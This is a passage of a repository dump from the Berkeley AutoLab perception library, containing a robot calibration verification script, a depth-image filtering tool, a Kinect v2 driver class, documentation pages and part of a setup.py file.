(sensor_frame))\n        ir_intrinsics.save(intr_filename)\n        f = open(\n            os.path.join(output_dir, \"corners_cb_%s.npy\" % (sensor_frame)), \"wb\"\n        )\n        np.save(f, reg_result.cb_points_cam.data)\n\n        # move the robot to the chessboard center for verification\n        if config[\"use_robot\"]:\n            # get robot type\n            robot_type = \"yumi\"\n            if \"robot_type\" in config.keys():\n                robot_type = config[\"robot_type\"]\n\n            # find the rightmost and furthest cb point in world frame\n            cb_points_world = T_camera_world * reg_result.cb_points_cam\n            cb_point_data_world = cb_points_world.data\n            dir_world = np.array([-1.0, 1.0, 0])\n            dir_world = dir_world / np.linalg.norm(dir_world)\n            ip = dir_world.dot(cb_point_data_world)\n\n            # open interface to robot\n            if robot_type == \"ur5\":\n                from ur_control import (\n                    KINEMATIC_AVOIDANCE_JOINTS,\n                    UniversalRobot,\n                )\n\n                robot = UniversalRobot()\n                robot.reset_home()\n            else:\n                y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n                y.reset_home()\n                robot = y.right\n            waypoints = []\n            time.sleep(1)\n\n            # choose target point #1\n            target_ind = np.where(ip == np.max(ip))[0]\n            target_pt_world = cb_points_world[target_ind[0]]\n\n            # create robot pose relative to target point\n            if robot_type == \"ur5\":\n                R_gripper_world = np.array(\n                    [[-1.0, 0, 0], [0, 1.0, 0], [0, 0, -1.0]]\n                )\n            else:\n                R_gripper_world = np.array(\n                    [[1.0, 0, 0], [0, -1.0, 0], [0, 0, -1.0]]\n                )\n            t_gripper_world = np.array(\n                [\n                    target_pt_world.x + config[\"gripper_offset_x\"],\n                    target_pt_world.y + config[\"gripper_offset_y\"],\n                    target_pt_world.z + config[\"gripper_offset_z\"],\n                ]\n            )\n            T_gripper_world = RigidTransform(\n                rotation=R_gripper_world,\n                translation=t_gripper_world,\n                from_frame=\"gripper\",\n                
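# the translation above is the target chessboard corner in world\n                # coordinates plus the configured gripper offsets\n                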
to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n T_orig_gripper_world_lift = T_gripper_world_lift.copy()\n\n if config[\"vis_cb_corners\"]:\n _, depth_im, _ = sensor.frames()\n points_world = T_camera_world * ir_intrinsics.deproject(\n depth_im\n )\n vis3d.figure()\n vis3d.points(cb_points_world, color=(0, 0, 1), scale=0.005)\n vis3d.points(\n points_world,\n color=(0, 1, 0),\n subsample=10,\n random=True,\n scale=0.001,\n )\n vis3d.pose(T_camera_world)\n vis3d.pose(T_gripper_world_lift)\n vis3d.pose(T_gripper_world)\n vis3d.pose(T_cb_world)\n vis3d.pose(RigidTransform())\n vis3d.table(dim=0.5, T_table_world=T_cb_world)\n vis3d.show()\n\n if robot_type == \"ur5\":\n robot.movej(KINEMATIC_AVOIDANCE_JOINTS, wait_for_res=True)\n robot.goto_pose(T_gripper_world_lift)\n else:\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n\n # choose target point 2\n target_ind = np.where(ip == np.min(ip))[0]\n target_pt_world = cb_points_world[target_ind[0]]\n\n # create robot pose relative to target point\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_orig_gripper_world_lift)\n\n # choose target point 3\n dir_world = np.array([1.0, 1.0, 0])\n dir_world = dir_world / np.linalg.norm(dir_world)\n ip = dir_world.dot(cb_point_data_world)\n target_ind = np.where(ip == np.max(ip))[0]\n target_pt_world = cb_points_world[target_ind[0]]\n\n # create robot pose relative to target point\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"cb\",\n )\n logging.info(\n \"Moving robot to point x=%f, y=%f, z=%f\"\n % (t_gripper_world[0], t_gripper_world[1], t_gripper_world[2])\n )\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"cb\", to_frame=\"cb\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. 
Hit [ENTER] when done\")\n robot.goto_pose(T_gripper_world_lift)\n robot.goto_pose(T_orig_gripper_world_lift)\n\n # stop robot\n robot.reset_home()\n if (\n robot_type != \"ur5\"\n and \"reset_bin\" in config.keys()\n and config[\"reset_bin\"]\n ):\n y.reset_bin()\n if robot_type == \"ur5\":\n robot.stop()\n else:\n y.stop()\n\n sensor.stop()\n"
},
{
"alpha_fraction": 0.5877193212509155,
"alphanum_fraction": 0.5877193212509155,
"avg_line_length": 18,
"blob_id": "88c011accb426745dc830e538f94de4971702601",
"content_id": "b4a49a512fcb739363ee9c4cd7c4ea1d0e95a222",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 114,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 6,
"path": "/docs/source/api/camera_intrinsics.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Camera Intrinsics\n=================\n\nCameraIntrinsics\n~~~~~~~~~~~~~~~~\n.. autoclass:: perception.CameraIntrinsics\n"
},
{
"alpha_fraction": 0.601046621799469,
"alphanum_fraction": 0.6239802837371826,
"avg_line_length": 30.69268226623535,
"blob_id": "2ce70590705eabac4056db221fb2f00a27368eac",
"content_id": "7f27fbf52ec4e1c42349e105690cd55716739499",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6497,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 205,
"path": "/tools/filter_images.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTry different image filtering methods\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport copy\nimport logging\nimport os\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pcl\nfrom autolab_core import Box, PointCloud, RigidTransform\nfrom visualization import Visualizer2D as vis2d\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception.virtual_camera_sensor import VirtualSensor\n\nmin_height = 0.001\nmax_height = 0.15\nrescale_factor = 0.5\n\nvis_clipping = False\nvis_segments = False\nvis_final_clouds = False\nvis_final_images = True\n\nif __name__ == \"__main__\":\n # set logging\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(description=\"Filter a set of images\")\n parser.add_argument(\n \"image_dir\", type=str, help=\"location to read the images from\"\n )\n parser.add_argument(\"frame\", type=str, help=\"frame of images\")\n args = parser.parse_args()\n image_dir = args.image_dir\n frame = args.frame\n\n # sensor\n sensor = VirtualSensor(image_dir)\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n\n # read tf\n T_camera_world = RigidTransform.load(\n os.path.join(image_dir, \"%s_to_world.tf\" % (frame))\n )\n\n # read images\n color_im, depth_im, _ = sensor.frames()\n\n # inpaint original image\n depth_im_filtered = depth_im.copy()\n depth_im_orig = depth_im.inpaint(rescale_factor)\n\n # timing\n filter_start = time.time()\n\n small_depth_im = depth_im.resize(rescale_factor, interp=\"nearest\")\n small_camera_intr = camera_intr.resize(rescale_factor)\n\n # convert to point cloud in world coords\n deproject_start = time.time()\n point_cloud_cam = small_camera_intr.deproject(small_depth_im)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n point_cloud_filtered = copy.deepcopy(point_cloud_world)\n logging.info(\"Deproject took %.3f sec\" % (time.time() - deproject_start))\n\n # filter low\n clip_start = time.time()\n low_indices = np.where(point_cloud_world.data[2, :] < min_height)[0]\n point_cloud_filtered.data[2, low_indices] = min_height\n\n # filter high\n high_indices = np.where(point_cloud_world.data[2, :] > max_height)[0]\n point_cloud_filtered.data[2, high_indices] = max_height\n\n # re-project and update depth im\n logging.info(\"Clipping took %.3f sec\" % (time.time() - clip_start))\n\n # vis\n focal_point = np.mean(point_cloud_filtered.data, axis=1)\n if vis_clipping:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n vis3d.points(\n point_cloud_world, scale=0.001, color=(1, 0, 0), subsample=10\n )\n vis3d.points(\n point_cloud_filtered, scale=0.001, color=(0, 0, 1), subsample=10\n )\n vis3d.show()\n\n pcl_start = time.time()\n\n # subsample point cloud\n # rate = int(1.0 / rescale_factor)**2\n # point_cloud_filtered = point_cloud_filtered.subsample(rate, random=False)\n box = Box(\n np.array([0.2, -0.24, min_height]),\n np.array([0.56, 0.21, max_height]),\n frame=\"world\",\n )\n point_cloud_masked, valid_indices = point_cloud_filtered.box_mask(box)\n invalid_indices = np.setdiff1d(\n np.arange(point_cloud_filtered.num_points), valid_indices\n )\n\n # apply PCL filters\n pcl_cloud = pcl.PointCloud(point_cloud_masked.data.T.astype(np.float32))\n tree = pcl_cloud.make_kdtree()\n ec = pcl_cloud.make_EuclideanClusterExtraction()\n ec.set_ClusterTolerance(0.005)\n # ec.set_MinClusterSize(1)\n # ec.set_MaxClusterSize(250)\n ec.set_MinClusterSize(250)\n 
ec.set_MaxClusterSize(1000000)\n ec.set_SearchMethod(tree)\n cluster_indices = ec.Extract()\n num_clusters = len(cluster_indices)\n\n segments = []\n filtered_points = np.zeros([3, point_cloud_masked.num_points])\n cur_i = 0\n for j, indices in enumerate(cluster_indices):\n num_points = len(indices)\n points = np.zeros([3, num_points])\n\n for i, index in enumerate(indices):\n points[0, i] = pcl_cloud[index][0]\n points[1, i] = pcl_cloud[index][1]\n points[2, i] = pcl_cloud[index][2]\n\n filtered_points[:, cur_i : cur_i + num_points] = points.copy()\n cur_i = cur_i + num_points\n\n seg_point_cloud = PointCloud(points, frame=\"world\")\n segments.append(seg_point_cloud)\n\n all_points = np.c_[\n filtered_points[:, :cur_i],\n point_cloud_filtered.data[:, invalid_indices],\n ]\n point_cloud_filtered = PointCloud(all_points, frame=\"world\")\n pcl_stop = time.time()\n logging.info(\"PCL Seg took %.3f sec\" % (pcl_stop - pcl_start))\n\n if vis_segments:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n for i, segment in enumerate(segments):\n color = plt.get_cmap(\"hsv\")(float(i) / num_clusters)[:-1]\n vis3d.points(segment, scale=0.001, color=color, subsample=5)\n vis3d.show()\n\n if vis_final_clouds:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n # vis3d.points(point_cloud_world,\n # scale=0.001,\n # color=(1,0,0),\n # subsample=10)\n vis3d.points(\n point_cloud_filtered, scale=0.001, color=(0, 0, 1), subsample=5\n )\n vis3d.show()\n\n # convert to depth image\n project_start = time.time()\n point_cloud_cam = T_camera_world.inverse() * point_cloud_filtered\n depth_im_filtered = small_camera_intr.project_to_image(point_cloud_cam)\n noise_mask = depth_im_filtered.to_binary()\n logging.info(\"Project took %.3f sec\" % (time.time() - project_start))\n depth_im_filtered = depth_im_filtered.inpaint(0.5)\n\n filter_stop = time.time()\n logging.info(\"Filtering took %.3f sec\" % (filter_stop - filter_start))\n\n if vis_final_images:\n vis2d.figure()\n vis2d.subplot(2, 2, 1)\n vis2d.imshow(depth_im)\n vis2d.title(\"Orig\")\n vis2d.subplot(2, 2, 2)\n vis2d.imshow(depth_im_orig)\n vis2d.title(\"Inpainted\")\n vis2d.subplot(2, 2, 3)\n vis2d.imshow(noise_mask)\n vis2d.title(\"Mask\")\n vis2d.subplot(2, 2, 4)\n vis2d.imshow(depth_im_filtered)\n vis2d.title(\"Filtered\")\n vis2d.show()\n"
},
{
"alpha_fraction": 0.5633578300476074,
"alphanum_fraction": 0.5711686015129089,
"avg_line_length": 30.852657318115234,
"blob_id": "8aa3d8b230dc86ae25ad1ddf21ce9eb6f82d957f",
"content_id": "ab2d2d8066b8bdf97225d2dc6d2586e75b1f69c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13187,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 414,
"path": "/perception/kinect2_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\n\nimport numpy as np\nimport pylibfreenect2 as lf2\nfrom autolab_core import (\n CameraIntrinsics,\n ColorImage,\n DepthImage,\n Image,\n IrImage,\n)\nfrom autolab_core.constants import MM_TO_METERS\n\nfrom .camera_sensor import CameraSensor\n\n\nclass Kinect2PacketPipelineMode:\n \"\"\"Type of pipeline for Kinect packet processing.\"\"\"\n\n OPENGL = 0\n CPU = 1\n OPENCL = 2\n AUTO = 3\n\n\nclass Kinect2FrameMode:\n \"\"\"Type of frames that Kinect processes.\"\"\"\n\n COLOR_DEPTH = 0\n COLOR_DEPTH_IR = 1\n\n\nclass Kinect2RegistrationMode:\n \"\"\"Kinect registration mode.\"\"\"\n\n NONE = 0\n COLOR_TO_DEPTH = 1\n\n\nclass Kinect2DepthMode:\n \"\"\"Kinect depth mode setting.\"\"\"\n\n METERS = 0\n MILLIMETERS = 1\n\n\nclass Kinect2Sensor(CameraSensor):\n # constants for image height and width (in case they're needed somewhere)\n \"\"\"Class for interacting with a Kinect v2 RGBD sensor directly through\n protonect driver. https://github.com/OpenKinect/libfreenect2\n \"\"\"\n\n # Constants for image height and width (in case they're needed somewhere)\n COLOR_IM_HEIGHT = 1080\n COLOR_IM_WIDTH = 1920\n DEPTH_IM_HEIGHT = 424\n DEPTH_IM_WIDTH = 512\n\n def __init__(\n self,\n packet_pipeline_mode=Kinect2PacketPipelineMode.AUTO,\n registration_mode=Kinect2RegistrationMode.COLOR_TO_DEPTH,\n depth_mode=Kinect2DepthMode.METERS,\n device_num=0,\n frame=None,\n ):\n \"\"\"Initialize a Kinect v2 sensor directly to the protonect driver with\n the given configuration. When kinect is connected to the protonect\n driver directly, the iai_kinect kinect_bridge cannot be run at the\n same time.\n\n Parameters\n ----------\n packet_pipeline_mode : int\n Either Kinect2PacketPipelineMode.OPENGL,\n Kinect2PacketPipelineMode.OPENCL or\n Kinect2PacketPipelineMode.CPU -- indicates packet processing type.\n If not specified the packet pipeline will be determined\n automatically.\n\n registration_mode : int\n Either Kinect2RegistrationMode.NONE or\n Kinect2RegistrationMode.COLOR_TO_DEPT -- The mode for registering\n a color image to the IR camera frame of reference.\n\n depth_mode : int\n Either Kinect2DepthMode.METERS or Kinect2DepthMode.MILLIMETERS --\n the units for depths returned from the Kinect frame arrays.\n\n device_num : int\n The sensor's device number on the USB bus.\n\n frame : :obj:`str`\n The name of the frame of reference in which the sensor resides.\n If None, this will be set to 'kinect2_num', where num is replaced\n with the device number.\n \"\"\"\n self._device = None\n self._running = False\n self._packet_pipeline_mode = packet_pipeline_mode\n self._registration_mode = registration_mode\n self._depth_mode = depth_mode\n self._device_num = device_num\n self._frame = frame\n\n if self._frame is None:\n self._frame = \"kinect2_%d\" % (self._device_num)\n self._color_frame = \"%s_color\" % (self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : Color camera intrinsics of Kinect.\"\"\"\n if self._device is None:\n raise RuntimeError(\n \"Kinect2 device not runnning. 
Cannot return color intrinsics\"\n            )\n        camera_params = self._device.getColorCameraParams()\n        return CameraIntrinsics(\n            self._color_frame,\n            camera_params.fx,\n            camera_params.fy,\n            camera_params.cx,\n            camera_params.cy,\n        )\n\n    @property\n    def ir_intrinsics(self):\n        \"\"\":obj:\`CameraIntrinsics\` : IR camera intrinsics for the Kinect.\"\"\"\n        if self._device is None:\n            raise RuntimeError(\n                \"Kinect2 device not running. Cannot return IR intrinsics\"\n            )\n        camera_params = self._device.getIrCameraParams()\n        return CameraIntrinsics(\n            self._ir_frame,\n            camera_params.fx,\n            camera_params.fy,\n            camera_params.cx,\n            camera_params.cy,\n            height=Kinect2Sensor.DEPTH_IM_HEIGHT,\n            width=Kinect2Sensor.DEPTH_IM_WIDTH,\n        )\n\n    @property\n    def is_running(self):\n        \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n        return self._running\n\n    @property\n    def frame(self):\n        \"\"\":obj:\`str\` : The reference frame of the sensor.\"\"\"\n        return self._frame\n\n    @property\n    def color_frame(self):\n        \"\"\":obj:\`str\` : The reference frame of the color sensor.\"\"\"\n        return self._color_frame\n\n    @property\n    def ir_frame(self):\n        \"\"\":obj:\`str\` : The reference frame of the IR sensor.\"\"\"\n        return self._ir_frame\n\n    def start(self):\n        \"\"\"Starts the Kinect v2 sensor stream.\n\n        Raises\n        ------\n        IOError\n            If the Kinect v2 is not detected.\n        \"\"\"\n\n        # setup logger\n        self._logger = lf2.createConsoleLogger(lf2.LoggerLevel.Warning)\n        lf2.setGlobalLogger(self._logger)\n\n        # open packet pipeline\n        self._pipeline = None\n        if (\n            self._packet_pipeline_mode == Kinect2PacketPipelineMode.OPENGL\n            or self._packet_pipeline_mode == Kinect2PacketPipelineMode.AUTO\n        ):\n            # Try OpenGL packet pipeline first or if specified\n            try:\n                self._pipeline = lf2.OpenGLPacketPipeline()\n            except BaseException:\n                logging.warning(\n                    \"OpenGL not available. \"\n                    \"Defaulting to CPU-based packet pipeline.\"\n                )\n\n        if self._pipeline is None and (\n            self._packet_pipeline_mode == Kinect2PacketPipelineMode.OPENCL\n            or self._packet_pipeline_mode == Kinect2PacketPipelineMode.AUTO\n        ):\n            # Try OpenCL if available\n            try:\n                self._pipeline = lf2.OpenCLPacketPipeline()\n            except BaseException:\n                logging.warning(\n                    \"OpenCL not available. Defaulting to CPU packet pipeline.\"\n                )\n\n        if (\n            self._pipeline is None\n            or self._packet_pipeline_mode == Kinect2PacketPipelineMode.CPU\n        ):  # CPU packet pipeline\n            self._pipeline = lf2.CpuPacketPipeline()\n\n        # check devices\n        self._fn_handle = lf2.Freenect2()\n        self._num_devices = self._fn_handle.enumerateDevices()\n        if self._num_devices == 0:\n            raise IOError(\n                \"Failed to start stream. No Kinect2 devices available!\"\n            )\n        if self._num_devices <= self._device_num:\n            raise IOError(\n                \"Failed to start stream. 
Device num %d unavailable!\"\n % (self._device_num)\n )\n\n # open device\n self._serial = self._fn_handle.getDeviceSerialNumber(self._device_num)\n self._device = self._fn_handle.openDevice(\n self._serial, pipeline=self._pipeline\n )\n\n # add device sync modes\n self._listener = lf2.SyncMultiFrameListener(\n lf2.FrameType.Color | lf2.FrameType.Ir | lf2.FrameType.Depth\n )\n self._device.setColorFrameListener(self._listener)\n self._device.setIrAndDepthFrameListener(self._listener)\n\n # start device\n self._device.start()\n\n # open registration\n self._registration = None\n if self._registration_mode == Kinect2RegistrationMode.COLOR_TO_DEPTH:\n logging.debug(\"Using color to depth registration\")\n self._registration = lf2.Registration(\n self._device.getIrCameraParams(),\n self._device.getColorCameraParams(),\n )\n self._running = True\n\n def stop(self):\n \"\"\"Stops the Kinect2 sensor stream.\n\n Returns\n -------\n bool\n True if the stream was stopped, False if the device was already\n stopped or was not otherwise available.\n \"\"\"\n # check that everything is running\n if not self._running or self._device is None:\n logging.warning(\n \"Kinect2 device %d not runnning. Aborting stop\"\n % (self._device_num)\n )\n return False\n\n # stop the device\n self._device.stop()\n self._device.close()\n self._device = None\n self._running = False\n return True\n\n def frames(self, skip_registration=False):\n \"\"\"Retrieve a new frame from the Kinect and convert it to a\n ColorImage and a DepthImage\n\n Parameters\n ----------\n skip_registration : bool\n If True, the registration step is skipped.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n The ColorImage and DepthImage of the current frame.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n color_im, depth_im, _, _ = self._frames_and_index_map(\n skip_registration=skip_registration\n )\n return color_im, depth_im\n\n def median_depth_img(self, num_img=1):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The median DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n depths.append(depth)\n\n return Image.median_images(depths)\n\n def _frames_and_index_map(self, skip_registration=False):\n \"\"\"Retrieve a new frame from the Kinect and return a ColorImage,\n DepthImage, IrImage, and a map from depth pixels to color\n pixel indices.\n\n Parameters\n ----------\n skip_registration : bool\n If True, the registration step is skipped.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`,\n :obj:`IrImage`, :obj:`numpy.ndarray`\n The ColorImage, DepthImage, and IrImage of the\n current frame, and an ndarray that maps pixels\n of the depth image to the index of the\n corresponding pixel in the color image.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n if not self._running:\n raise RuntimeError(\n \"Kinect2 device %s not runnning. 
Cannot read frames\"\n % (self._device_num)\n )\n\n # read frames\n frames = self._listener.waitForNewFrame()\n unregistered_color = frames[\"color\"]\n distorted_depth = frames[\"depth\"]\n ir = frames[\"ir\"]\n\n # apply color to depth registration\n color_frame = self._color_frame\n color = unregistered_color\n depth = distorted_depth\n color_depth_map = (\n np.zeros([depth.height, depth.width]).astype(np.int32).ravel()\n )\n if (\n not skip_registration\n and self._registration_mode\n == Kinect2RegistrationMode.COLOR_TO_DEPTH\n ):\n color_frame = self._ir_frame\n depth = lf2.Frame(\n depth.width, depth.height, 4, lf2.FrameType.Depth\n )\n color = lf2.Frame(\n depth.width, depth.height, 4, lf2.FrameType.Color\n )\n self._registration.apply(\n unregistered_color,\n distorted_depth,\n depth,\n color,\n color_depth_map=color_depth_map,\n )\n\n # convert to array (copy needed to prevent reference of deleted data\n color_arr = np.copy(color.asarray())\n color_arr[:, :, [0, 2]] = color_arr[:, :, [2, 0]] # convert BGR to RGB\n color_arr[:, :, 0] = np.fliplr(color_arr[:, :, 0])\n color_arr[:, :, 1] = np.fliplr(color_arr[:, :, 1])\n color_arr[:, :, 2] = np.fliplr(color_arr[:, :, 2])\n color_arr[:, :, 3] = np.fliplr(color_arr[:, :, 3])\n depth_arr = np.fliplr(np.copy(depth.asarray()))\n ir_arr = np.fliplr(np.copy(ir.asarray()))\n\n # convert from mm to meters\n if self._depth_mode == Kinect2DepthMode.METERS:\n depth_arr = depth_arr * MM_TO_METERS\n\n # Release and return\n self._listener.release(frames)\n return (\n ColorImage(color_arr[:, :, :3], color_frame),\n DepthImage(depth_arr, self._ir_frame),\n IrImage(ir_arr.astype(np.uint16), self._ir_frame),\n color_depth_map,\n )\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6083915829658508,
"avg_line_length": 19.428571701049805,
"blob_id": "8727d3f992a10ed534cbfa1ffc03c6ad106b3f58",
"content_id": "d7fd09728d2744b74a0330110aaa61469a58abb6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 143,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 7,
"path": "/docs/source/api/cnn.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Convolutional Neural Networks\n=============================\nClasses for deploying ConvNets.\n\nAlexNet\n~~~~~~~\n.. autoclass:: perception.AlexNet\n"
},
{
"alpha_fraction": 0.6109589338302612,
"alphanum_fraction": 0.6273972392082214,
"avg_line_length": 20.47058868408203,
"blob_id": "bc100b1c17e1520c8b1ffc3565e99b1e03ce3820",
"content_id": "49f1fc228fe82ec2927bcf3724f066a87569a661",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 17,
"path": "/tools/test_weight_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTest the loadstar weight sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport time\n\nfrom perception import WeightSensor\n\nif __name__ == \"__main__\":\n # sensor\n weight_sensor = WeightSensor()\n weight_sensor.start()\n weight_sensor.tare()\n for i in range(100):\n print(\"Total weight:\", weight_sensor.read().sum())\n time.sleep(0.05)\n weight_sensor.stop()\n"
},
{
"alpha_fraction": 0.8066037893295288,
"alphanum_fraction": 0.8066037893295288,
"avg_line_length": 25.5,
"blob_id": "6cf1b2dfa2ac0c0162c32cf4fb2e5db761562ba6",
"content_id": "b7bc7d294303929843c63ebc4850a909116c35b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 8,
"path": "/perception/__init__.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAutolab Drivers\nAuthors: Jeff, Jacky, Mike\n\"\"\"\nfrom .camera_sensor import CameraSensor\nfrom .rgbd_sensors import RgbdSensorFactory\nfrom .weight_sensor import WeightSensor\nfrom .video_recorder import VideoRecorder\n"
},
{
"alpha_fraction": 0.7024253606796265,
"alphanum_fraction": 0.7052238583564758,
"avg_line_length": 25.121952056884766,
"blob_id": "25874e5fbc1948cbd1c2f89d0974d38847b48f3c",
"content_id": "0aea4dc9e24a09c43923c05d778c6c792bd13a63",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 41,
"path": "/docs/source/install/install.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Installation Instructions\n=========================\n\nThis package is installable via `pip` ::\n\n $ pip install autolab_perception\n\nDocumentation\n~~~~~~~~~~~~~\n\nBuilding\n\"\"\"\"\"\"\"\"\nBuilding `autolab_perception`'s documentation requires a few extra dependencies --\nspecifically, `sphinx`_ and a few plugins.\n\n.. _sphinx: http://www.sphinx-doc.org/en/1.4.8/\n\nTo install the dependencies required, simply change directories into the `autolab_core` source and run ::\n\n $ pip install .[docs]\n\nThen, go to the `docs` directory and run ``make`` with the appropriate target.\nFor example, ::\n\n $ cd docs/\n $ make html\n\nwill generate a set of web pages. Any documentation files\ngenerated in this manner can be found in `docs/build`.\n\nDeploying\n\"\"\"\"\"\"\"\"\"\nTo deploy documentation to the Github Pages site for the repository,\nsimply push any changes to the documentation source to master\nand then run ::\n\n $ . gh_deploy.sh\n\nfrom the `docs` folder. This script will automatically checkout the\n``gh-pages`` branch, build the documentation from source, and push it\nto Github.\n\n"
},
{
"alpha_fraction": 0.6175548434257507,
"alphanum_fraction": 0.6250783801078796,
"avg_line_length": 29.673076629638672,
"blob_id": "310624e3c7399cb9d92ddccd679d051ab5346e2f",
"content_id": "b24807506bfeb761d22b792f481d5122247723fe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1595,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 52,
"path": "/setup.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSetup of Berkeley AUTOLab Perception module Python codebase.\nAuthor: Jeff Mahler\n\"\"\"\nimport os\n\nfrom setuptools import setup\n\nrequirements = [\n \"numpy\",\n \"scipy\",\n \"autolab_core\",\n \"opencv-python\",\n \"pyserial>=3.4\",\n \"ffmpeg-python\",\n]\n\n# load __version__ without importing anything\nversion_file = os.path.join(os.path.dirname(__file__), \"perception/version.py\")\nwith open(version_file, \"r\") as f:\n # use eval to get a clean string of version from file\n __version__ = eval(f.read().strip().split(\"=\")[-1])\n\nsetup(\n name=\"autolab_perception\",\n version=__version__,\n description=\"Perception utilities for the Berkeley AutoLab\",\n author=\"Jeff Mahler\",\n author_email=\"[email protected]\",\n maintainer=\"Mike Danielczuk\",\n maintainer_email=\"[email protected]\",\n license=\"Apache Software License\",\n url=\"https://github.com/BerkeleyAutomation/perception\",\n keywords=\"robotics grasping vision perception\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.6\",\n 